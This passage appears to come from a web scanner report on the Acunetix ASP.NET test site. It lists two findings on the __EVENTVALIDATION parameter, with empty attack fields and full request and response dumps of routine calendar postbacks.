malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8624&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAWBLHmtsIZGRkVeTJLgQPexkv1MqVstV0GZEHqYE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKw5OLNCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZPXB0eEnFKn%2B1epEQDeC3tbLN%2BbQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:35 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAWBLHmtsIZGRkVeTJLgQPexkv1MqVstV0GZEHqYE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKw5OLNCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZPXB0eEnFKn+1epEQDeC3tbLN+bQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:White" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8589&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAA40VGf9sIZGRkJ%2FWhloJNo1GumPjkShl6DGs6rbQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKWhfqrCQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCuysXYASib2284y%2BRxq7FGjHGKcR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:28 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAA40VGf9sIZGRkJ/WhloJNo1GumPjkShl6DGs6rbQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKWhfqrCQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCuysXYASib2284y+Rxq7FGjHGKcR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:White" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming 